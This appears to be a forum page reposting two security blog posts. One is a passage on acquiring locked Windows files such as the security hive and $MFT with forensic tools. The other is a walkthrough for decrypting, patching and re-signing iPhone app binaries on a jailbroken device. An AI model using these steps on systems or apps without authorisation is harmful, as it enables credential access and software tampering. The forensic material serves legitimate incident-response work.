6174 6120 6461 7461 200a 0000 0000 data data ..... 0000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000310: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000320: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00003e0: 0000 0000 0000 0000 0000 0000 7275 653b ............rue; 00003f0: 7d3b 7362 5f67 683d 6675 6e63 7469 6f6e };sb_gh=function 0000400: 2829 7b72 6574 7572 6e20 6c6f 6361 7469 (){return locati 0000410: 6f6e 2e68 6173 687d 3b73 625f 7368 3d66 on.hash};sb_sh=f 0000420: 756e 6374 696f 6e28 6129 7b6c 6f63 6174 unction(a){locat 0000430: 696f 6e2e 6861 7368 3d61 7d3b 5f77 3d77 ion.hash=a};_w=w 0000440: 696e 646f 773b 5f64 3d64 6f63 756d 656e indow;_d=documen 0000450: 743b 7362 5f64 653d 5f64 2e64 6f63 756d t;sb_de=_d.docum 0000460: 656e 7445 6c65 6d65 6e74 3b73 625f 6965 entElement;sb_ie 0000470: 3d21 215f 772e 4163 7469 7665 584f 626a =!!_w.ActiveXObj As you can see, there is data being printed to stdout even after the data in our file has ended. The reason for this is because a file occupies sectors grouped together on an even boundary. This grouping of sectors is called a cluster and the data that we see after the end of the file is referred to as slack space, remnants of old files that used to occupy the same sectors that now are part of the clusters for our file. As a side note and interesting detail from a forensics stand point is that no time stamps are modified. Using icat and ifind Now that we know the basics of what is needed to acquire a file using the Win32 device namespace, let’s take a look at using a more automated method for doing so. Another way to get files of the system (not worrying about slack space at the end of the file and with no need for manual calculation of where the clusters start and end) is to use the utilities ‘ifind’ and ‘icat’ from Brian Carriers’ the Sleuthkit.The Sleuthkit, in my opinion, is the best and most flexible forensic toolkit available – and it’s open source. By specifying the drive letter and the path to the file, ‘icat’ will return the entry number the file has in the $MFT. While this number is referred to as an $MFT entry on NTFS, it’s called an inode in UNIX based file systems. In order for ‘ifind’ to work properly the full path to must be given using UNIX style path (forward slash instead of back slash and with no drive letter in the beginning of the path). In this example we will acquire the security registry hive from the running system, a file that is normally not accessible. C:\>ifind.exe -V The Sleuth Kit ver 3.2.3 C:\>ifind.exe -n /windows/system32/config/security \\.\c: 27392 By using the files number in the $MFT as an argument to ‘icat’ we can easily carve out the file from the file system. The ‘icat’ program will take care of terminating the output where the file ends but we need to redirect the output from stdout to wherever we want to store the file. C:\>icat.exe \\.\c: 27392 > c:\security.bin C:\> file.exe security.bin security.bin; MS Windows registry file, NT/2000 or above Now that we know how to bypass Windows file protection the only thing that remains is to automate the procedure so that we can include the “locked” files in our live data acquisition phase. I was going to post my wrapper script to ‘ifind’ and ‘icat’ but when I did some researching on the Internet I found a much better tool called ‘ntfscopy’. ntfscopy The tool is written by Jonathan Tomczak from TZWorks LLC and does exactly what we have discussed above plus more. You can download it from http://tzworks.net. Here are the options that ‘ntfscopy’ supports; usage: copying by filename ntfscopy.exe = live system ntfscopy.exe -image [-offset ] other options that can be used w/ the above -raw = output raw clusters including slack space -meta = pull out metadata into separate file [.meta.txt] -skip_sparse_clusters = don't include sparse clusters in the output -md5 = prepends last mod time to filename and appends md5 hash experimental options a. copying by logical cluster number (LCN) ntfscopy.exe -partition -cluster ntfscopy.exe -image [-offset ] -cluster b. copying from a VMWare virtual NTFS drive (limited) ntfscopy.exe -vmdk [-vmdk ] c. piping in which files to copy dir \* /b /s | ntfscopy.exe -pipe -md5 Here is an example of using ‘ntfscopy’ to acquire a copy of the $MFT from a live Windows system. C:\>ntfscopy.exe c:\$MFT c:\copy_of_MFT ntfscopy ver: 0.65, Copyright (c) TZWorks LLC copy successful Forensic Get Another tool that will get the job done is FGET or Forensic Get from HBGary, Inc. The program can not only acquire “locked” files from a local file system, but does also support over the network operations. FGET and other free tools from HBGary can be downloaded from http://hbgary.com/free-tools. Below is an example of me using FGET to acquire a copy of the $Mft. C:\>FGET.exe -extract c:\$Mft c:\copy_of_Mft2.bin -= FGET v1.0 - Forensic Data Acquisition Utility - (c)HBGary, Inc 2010 =- [+] Extracting File From Volume ...SUCCESS! By including 'ntfscopy' or any of the other methods described above, forensic examiners and incident responders can now acquire protected files through a command line interface. Examples of how we can put everything together and automate it will be explained in part II of this blog post. Bio Par Osterberg Medina has worked with computer security for over 15 years, with a background in both system administration and penetration testing. Prior to joining Foundstone, Par spent the last 8 years working as an Incident Handler for the Swedish GovCERT, investigating computer intrusions and coordinating security related incidents. He specializes in Malware Analysis and Memory Forensics, finding Rootkits that tries to stay hidden in the Operating System. He has conducted training and lectured on this subject all over the world at conferences such as FIRST and The GOVCERT.NL Symposium. Sursa: http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html
  25. Decrypting iPhone Apps saurabh @ 13:57 This blog post steps through how to convert encrypted iPhone application bundles into plaintext application bundles that are easier to analyse. Requirements: 1) Jailbroken iPhone with OpenSSH, gdb plus other utilities (com.ericasadun.utilities etc. etc.) 2) An iPhone app 3) On your machine: otool (comes with iPhone SDK) Hex editor (0xED, HexWorkshop etc.) Ida - Version 5.2 through 5.6 supports remote debugging of iPhone applications (iphone_server). For this article, I will use the app name as "blah". Some groundwork, taken from Apple's API docs [1, 2]: The iPhone apps are based on Mach-O (Mach Object) file format. The image below illustrates the file format at high-level: A Mach-O file contains three major regions: 1. At the beginning of every Mach-O file is a header structure that identifies the file as a Mach-O file. The header also contains other basic file type information, indicates the target architecture, and contains flags specifying options that affect the interpretation of the rest of the file. 2. Directly following the header are a series of variable-size load commands that specify the layout and linkage characteristics of the file. Among other information, the load commands can specify: The initial layout of the file in virtual memory The location of the symbol table (used for dynamic linking) The initial execution state of the main thread of the program The names of shared libraries that contain definitions for the main executable's imported symbols 3. Following the load commands, all Mach-O files contain the data of one or more segments. Each segment contains zero or more sections. Each section of a segment contains code or data of some particular type. Each segment defines a region of virtual memory that the dynamic linker maps into the address space of the process. The exact number and layout of segments and sections is specified by the load commands and the file type. 4. In user-level fully linked Mach-O files, the last segment is the link edit segment. This segment contains the tables of link edit information, such as the symbol table, string table, and so forth, used by the dynamic loader to link an executable file or Mach-O bundle to its dependent libraries. The iPhone apps are normally encrypted and are decrypted by the iPhone loader at run time. One of the load commands is responsible for decrypting the executable. Push EBP Mov EBP, ESP JMP loc_6969 loc_6969: Once you have downloaded and installed an app on your iPhone, make a copy of the actual executable on your machine. Note1: The blah.app is not the actual executable. If you browse this folder, you will find a binary file named blah. This is the actual application binary. Note2: To find the path where your application is installed, ssh onto your iPhone and use the following command: sudo find / | grep blap.app Once you have copied the app binary on your machine, follow the steps below (on your local machine). Open up a terminal and type the following command: otool —l blah | grep crypt This assumes that iPhone SDK or otool is already installed on your machine. The above command will produce the following output: If cryptid is set to 1, it implies that the app is encrypted. cryptoff and cryptsize indicates the offset and size of crypt section respectively. Now, firstly we'll have to locate the cryptid in the binary and set it to zero. This is done so that when we finally decrypt the binary and execute it on iPhone, the loader does not attempt to decrypt it again. Open the binary in a hex editor and load the binary. I did not come across any definite method of locating the cryptid. Once you have loaded the binary in a hex editor, search for “/System/Library/Frameworks”. You should be able to locate it around the address 0x1000. In the line, just above the very first instance of this statement (/System/Library/Frameworks), you will find bytes 01. Flip it to 00 and save the file. Note3: In case you find multiple instances of 01, use coin-tossing method of choosing between them. Use otool again to query the crypt data. You will see that the cryptid is now set to 0 (zero). Next, we need to run the app, which was installed on iPhone and take a memory dump. Note4: The actual application code starts at 0x2000. The cryptsize in case of our sample app is 942080 (0xE6000). Hence, we add 0x2000 and 0xE6000. 0x2000 + 0xE6000 = 0xE8000 Therefore, we need to dump the running process from 0x2000 till 0xE8000. Now, ssh onto your iPhone, run the target app and look for the process id using “ps —ax” command. Once you have the process id, use the following command to dump the process: gdb —p PID dump memory blah.bin 0x2000 0xE8000 Once you have taken the memory dump, use “quit” command to exit gdb. Use the following command to get the size of memory dump: ls —l blah.bin The size of this bin file should exactly be same as the cryptsize of the original app. Refer to screenshot above. Now pull this bin file onto your local machine. On your local machine, load the bin file in a hex editor and copy everything (using select all or whatever). Close the file and open the original app in the hex editor. (The file in which we modified cryptid 01 to 00). If you remember, the cryptoff was 4096, which is 0x1000 (in hex). Proceed to memory address 0x1000 and make sure that your hex editor is in overwrite mode, not in append mode. Once you are on memory address 0x1000, paste everything you copied from the bin file. This will overwrite the encrypted section with the decrypted one. Save the file and you're done. Open the file in IDA pro and you'll see the difference between the encrypted and decrypted binaries. At this point, you can easily reverse engineer the app and patch it. The first image below shows an encrypted app and the second one illustrates a decrypted app: After patching the application, ssh onto the iPhone and upload it to the application directory. This would mean replace the original binary with the patched one. Once uploaded, install a utility called "ldid" on your iphone. apt-get install ldid Finally, sign the patched binary using ldid: ldid -s blah This will fix the code signatures and you will be able to run the patched app on your iPhone. References: 1) http://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html 2) http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html Sursa: http://www.sensepost.com/blog/6254.html
×
×
  • Create New...